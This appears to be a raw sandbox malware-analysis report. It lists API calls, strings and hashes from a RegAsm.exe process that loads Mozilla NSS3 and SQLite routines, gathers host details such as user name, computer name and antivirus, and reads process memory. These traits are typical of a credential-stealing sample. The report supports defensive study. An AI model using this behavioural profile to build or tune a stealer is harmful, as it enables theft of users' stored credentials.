                                                                                                          • Part of subcall function 6C20FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C20FE3D
                                                                                                          • Part of subcall function 6C20FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C20FE6F
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C1B6E4C
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21116E
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C2D8FE0,00000000), ref: 6C1B6E82
                                                                                                          • Part of subcall function 6C1B6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C1BB21D,00000000,00000000,6C1BB219,?,6C1B6BFB,00000000,?,00000000,00000000,?,?,?,6C1BB21D), ref: 6C1B6B01
                                                                                                          • Part of subcall function 6C1B6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C1B6B8A
                                                                                                        • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C1B6F1E
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C1B6F35
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C2D8FE0,00000000), ref: 6C1B6F6B
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,6C1B7D8F,?,?), ref: 6C1B6FE1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 587344769-0
                                                                                                        • Opcode ID: 9fa5f393819a26307c8cf8864681886ca5a1ade2a741018510b84ece3600ceb2
                                                                                                        • Instruction ID: 1230a817c4ccd5e6348643604da235ed0f92d04fc503df52244123c5afd32ea5
                                                                                                        • Opcode Fuzzy Hash: 9fa5f393819a26307c8cf8864681886ca5a1ade2a741018510b84ece3600ceb2
                                                                                                        • Instruction Fuzzy Hash: 0C717F71E1024A9FEB04CF15CD50BAA77A4BF65348F16426AEC08E7B11F770E994CB90
                                                                                                        APIs
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C1F1057
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1F1085
                                                                                                        • PK11_GetAllTokens.NSS3 ref: 6C1F10B1
                                                                                                        • free.MOZGLUE(?), ref: 6C1F1107
                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C1F1172
                                                                                                        • free.MOZGLUE(?), ref: 6C1F1182
                                                                                                        • free.MOZGLUE(?), ref: 6C1F11A6
                                                                                                        • SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C1F11C5
                                                                                                          • Part of subcall function 6C1F52C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C1CEAC5,00000001), ref: 6C1F52DF
                                                                                                          • Part of subcall function 6C1F52C0: EnterCriticalSection.KERNEL32(?), ref: 6C1F52F3
                                                                                                          • Part of subcall function 6C1F52C0: PR_Unlock.NSS3(?), ref: 6C1F5358
                                                                                                        • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C1F11D3
                                                                                                        • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C1F11F3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1549229083-0
                                                                                                        • Opcode ID: bef1261d0aa6de4852f9ae0c7e6b871769591bebfc207250d95b94b5e527e2b3
                                                                                                        • Instruction ID: 98d371040fc6e30e0aeb3bc3f1361b3a77e16405323dc29f270eae8f1c3294cd
                                                                                                        • Opcode Fuzzy Hash: bef1261d0aa6de4852f9ae0c7e6b871769591bebfc207250d95b94b5e527e2b3
                                                                                                        • Instruction Fuzzy Hash: D161C2F0E043059BEB00DF64D885B9AB7F5BF19348F244128EC29AB741E731E956CBA1
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE10
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE24
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,6C1DD079,00000000,00000001), ref: 6C1FAE5A
                                                                                                        • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE6F
                                                                                                        • free.MOZGLUE(85145F8B,?,?,?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE7F
                                                                                                        • TlsGetValue.KERNEL32(?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAEB1
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAEC9
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAEF1
                                                                                                        • free.MOZGLUE(6C1DCDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C1DCDBB,?), ref: 6C1FAF0B
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAF30
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 161582014-0
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C1DAB7F,?,00000000,?), ref: 6C1D4CB4
                                                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,6C1DAB7F,?,00000000,?), ref: 6C1D4CC8
                                                                                                        • TlsGetValue.KERNEL32(?,6C1DAB7F,?,00000000,?), ref: 6C1D4CE0
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,6C1DAB7F,?,00000000,?), ref: 6C1D4CF4
                                                                                                        • PL_HashTableLookup.NSS3(?,?,?,6C1DAB7F,?,00000000,?), ref: 6C1D4D03
                                                                                                        • PR_Unlock.NSS3(?,00000000,?), ref: 6C1D4D10
                                                                                                          • Part of subcall function 6C25DD70: TlsGetValue.KERNEL32 ref: 6C25DD8C
                                                                                                          • Part of subcall function 6C25DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C25DDB4
                                                                                                        • PR_Now.NSS3(?,00000000,?), ref: 6C1D4D26
                                                                                                          • Part of subcall function 6C279DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C2C0A27), ref: 6C279DC6
                                                                                                          • Part of subcall function 6C279DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C2C0A27), ref: 6C279DD1
                                                                                                          • Part of subcall function 6C279DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C279DED
                                                                                                        • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C1D4D98
                                                                                                        • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C1D4DDA
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C1D4E02
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID:
                                                                                                        • API String ID: 4032354334-0
                                                                                                        APIs
                                                                                                        • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C1B2CDA,?,00000000), ref: 6C1B2E1E
                                                                                                          • Part of subcall function 6C20FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C1B9003,?), ref: 6C20FD91
                                                                                                          • Part of subcall function 6C20FD80: PORT_Alloc_Util.NSS3(A4686C21,?), ref: 6C20FDA2
                                                                                                          • Part of subcall function 6C20FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C21,?,?), ref: 6C20FDC4
                                                                                                        • SECITEM_DupItem_Util.NSS3(?), ref: 6C1B2E33
                                                                                                          • Part of subcall function 6C20FD80: free.MOZGLUE(00000000,?,?), ref: 6C20FDD1
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1B2E4E
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1B2E5E
                                                                                                        • PL_HashTableLookup.NSS3(?), ref: 6C1B2E71
                                                                                                        • PL_HashTableRemove.NSS3(?), ref: 6C1B2E84
                                                                                                        • PL_HashTableAdd.NSS3(?,00000000), ref: 6C1B2E96
                                                                                                        • PR_Unlock.NSS3 ref: 6C1B2EA9
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1B2EB6
                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C1B2EC5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3332421221-0
                                                                                                        APIs
                                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C13B999), ref: 6C13CFF3
                                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C13B999), ref: 6C13D02B
                                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C13B999), ref: 6C13D041
                                                                                                        • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C13B999), ref: 6C28972B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_log$_byteswap_ushort
                                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                        • API String ID: 491875419-598938438
                                                                                                        APIs
                                                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C21536F,00000022,?,?,00000000,?), ref: 6C214E70
                                                                                                        • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C214F28
                                                                                                        • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C214F8E
                                                                                                        • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C214FAE
                                                                                                        • free.MOZGLUE(?), ref: 6C214FC8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                        • String ID: %s=%c%s%c$%s=%s$oS!l"
                                                                                                        • API String ID: 2709355791-431619459
                                                                                                        APIs
                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000,?,6C25A4A1,?,00000000,?,00000001), ref: 6C23EF6D
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        • htonl.WSOCK32(00000000,?,6C25A4A1,?,00000000,?,00000001), ref: 6C23EFE4
                                                                                                        • htonl.WSOCK32(?,00000000,?,6C25A4A1,?,00000000,?,00000001), ref: 6C23EFF1
                                                                                                        • memcpy.VCRUNTIME140(?,?,6C25A4A1,?,00000000,?,6C25A4A1,?,00000000,?,00000001), ref: 6C23F00B
                                                                                                        • memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C25A4A1,?,00000000,?,00000001), ref: 6C23F027
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: htonlmemcpy$ErrorValue
                                                                                                        • String ID: dtls13
                                                                                                        • API String ID: 242828995-1883198198
                                                                                                        APIs
                                                                                                        • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C1BAFBE
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C2D9500,6C1B3F91), ref: 6C1BAFD2
                                                                                                          • Part of subcall function 6C20B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2E18D0,?), ref: 6C20B095
                                                                                                        • DER_GetInteger_Util.NSS3(?), ref: 6C1BB007
                                                                                                          • Part of subcall function 6C206A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C1B1666,?,6C1BB00C,?), ref: 6C206AFB
                                                                                                        • PR_SetError.NSS3(FFFFE009,00000000), ref: 6C1BB02F
                                                                                                        • PR_CallOnce.NSS3(6C312AA4,6C2112D0), ref: 6C1BB046
                                                                                                        • PL_FreeArenaPool.NSS3 ref: 6C1BB058
                                                                                                        • PL_FinishArenaPool.NSS3 ref: 6C1BB060
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
                                                                                                        • String ID: security
                                                                                                        • API String ID: 3627567351-3315324353
                                                                                                        APIs
                                                                                                        • UnDecorator::getArgumentList.LIBCMT ref: 0041F969
                                                                                                          • Part of subcall function 0041F504: Replicator::operator[].LIBCMT ref: 0041F587
                                                                                                          • Part of subcall function 0041F504: DName::operator+=.LIBCMT ref: 0041F58F
                                                                                                        • DName::operator+.LIBCMT ref: 0041F9C2
                                                                                                        • DName::DName.LIBCMT ref: 0041FA1A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                        • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C1EACE6
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1EAD14
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1EAD23
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1EAD39
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: L_strncpyzPrint$L_strcatn
                                                                                                        • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$n,l
                                                                                                        APIs
                                                                                                        • UnDecorator::UScore.LIBCMT ref: 004212E7
                                                                                                        • DName::DName.LIBCMT ref: 004212F3
                                                                                                          • Part of subcall function 0041EFBE: DName::doPchar.LIBCMT ref: 0041EFEF
                                                                                                        • UnDecorator::getScopedName.LIBCMT ref: 00421332
                                                                                                        • DName::operator+=.LIBCMT ref: 0042133C
                                                                                                        • DName::operator+=.LIBCMT ref: 0042134B
                                                                                                        • DName::operator+=.LIBCMT ref: 00421357
                                                                                                        • DName::operator+=.LIBCMT ref: 00421364
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                        • String ID: void
                                                                                                        APIs
                                                                                                        • CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00411596
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
                                                                                                        • wsprintfA.USER32 ref: 004115BB
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                        • String ID: %dx%d
                                                                                                        APIs
                                                                                                        • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C1FCD08
                                                                                                        • PK11_DoesMechanism.NSS3(?,?), ref: 6C1FCE16
                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C1FD079
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                        • String ID:
                                                                                                        APIs
                                                                                                        • PORT_ZAlloc_Util.NSS3(6F09BAB5), ref: 6C1B2C5D
                                                                                                          • Part of subcall function 6C210D30: calloc.MOZGLUE ref: 6C210D50
                                                                                                          • Part of subcall function 6C210D30: TlsGetValue.KERNEL32 ref: 6C210D6D
                                                                                                        • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C1B2C8D
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C1B2CE0
                                                                                                          • Part of subcall function 6C1B2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C1B2CDA,?,00000000), ref: 6C1B2E1E
                                                                                                          • Part of subcall function 6C1B2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C1B2E33
                                                                                                          • Part of subcall function 6C1B2E00: TlsGetValue.KERNEL32 ref: 6C1B2E4E
                                                                                                          • Part of subcall function 6C1B2E00: EnterCriticalSection.KERNEL32(?), ref: 6C1B2E5E
                                                                                                          • Part of subcall function 6C1B2E00: PL_HashTableLookup.NSS3(?), ref: 6C1B2E71
                                                                                                          • Part of subcall function 6C1B2E00: PL_HashTableRemove.NSS3(?), ref: 6C1B2E84
                                                                                                          • Part of subcall function 6C1B2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C1B2E96
                                                                                                          • Part of subcall function 6C1B2E00: PR_Unlock.NSS3 ref: 6C1B2EA9
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1B2D23
                                                                                                        • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C1B2D30
                                                                                                        • CERT_MakeCANickname.NSS3(00000001), ref: 6C1B2D3F
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1B2D73
                                                                                                        • CERT_DestroyCertificate.NSS3(?), ref: 6C1B2DB8
                                                                                                        • free.MOZGLUE ref: 6C1B2DC8
                                                                                                          • Part of subcall function 6C1B3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1B3EC2
                                                                                                          • Part of subcall function 6C1B3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C1B3ED6
                                                                                                          • Part of subcall function 6C1B3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C1B3EEE
                                                                                                          • Part of subcall function 6C1B3E60: PR_CallOnce.NSS3(6C312AA4,6C2112D0), ref: 6C1B3F02
                                                                                                          • Part of subcall function 6C1B3E60: PL_FreeArenaPool.NSS3 ref: 6C1B3F14
                                                                                                          • Part of subcall function 6C1B3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C1B3F27
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 3941837925-0
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C0931A7), ref: 6C0CCDDD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                        • API String ID: 4275171209-2186867486
                                                                                                        APIs
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C14E922
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C14E9CF
                                                                                                        • memcpy.VCRUNTIME140(00000024,?,?), ref: 6C14EA0F
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C14EB20
                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C14EB57
                                                                                                        Strings
                                                                                                        • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 6C14EDC2
                                                                                                        • unknown column "%s" in foreign key definition, xrefs: 6C14ED18
                                                                                                        • foreign key on %s should reference only one column of table %T, xrefs: 6C14EE04
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpystrlen$memset
                                                                                                        • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                        • API String ID: 638109778-272990098
                                                                                                        APIs
                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040F934
                                                                                                        • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000), ref: 0040F95E
                                                                                                        • ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 0040F9AB
                                                                                                        • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0040FA04
